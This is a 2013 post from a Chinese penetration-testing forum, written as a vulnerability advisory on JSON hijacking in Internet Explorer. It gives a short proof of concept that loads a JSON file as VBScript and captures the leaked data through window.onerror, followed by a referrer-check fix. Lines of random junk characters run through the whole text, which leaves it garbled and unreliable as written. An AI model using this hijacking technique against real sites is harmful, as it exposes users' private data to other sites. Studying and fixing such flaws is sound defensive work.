中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
8 C) e' S* {0 q9 r$ }9 d) A
9 o1 W* T& K: O' a0 H" p/ v, F% V% Q
由于某些资源容器对数据处理不当导致json劫持漏洞.
- d+ _6 `, g z% `5 C* v6 S$ d
详细说明:
+ J! M: d& [; r" i) Q0 k2 E& |
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
! \2 y* L& _, R4 U$ M8 l
<script language=vbscript></script>
% a6 Q$ [. D: p
K, s- K' u A3 z, P6 K3 F
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
4 v* I4 p4 p* m8 h) {
漏洞证明:
B& u) D0 B( e) ]* D( x* |
<script>
q3 B& X3 v/ g! @- ?+ c9 s+ P
window.onerror=function(_){
+ r6 V" ?0 _2 q! s* K
alert(_)
+ S+ Q p2 i* w' Q- q! l7 K7 B% K7 ?: j
}
! j H# T4 R6 X Y& P
</script>
8 [ C+ t+ R' b) }. r+ M
<script language=vbscript src=1.json></script>
6 ~7 }$ O. L, B: u# l3 v+ Y- A3 y
3 J" u% W F: Q; R
+ P6 y% d2 ]" b3 b x
1.json:
. [+ n' I! F7 p% Z1 p% F8 S. c' M
[{"name":"sogili","age":19}]
: }% s) {9 `7 w3 ~7 ~ C* O" x) `
修复方案:
, F2 u6 j7 `/ U$ H( K3 T3 f
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2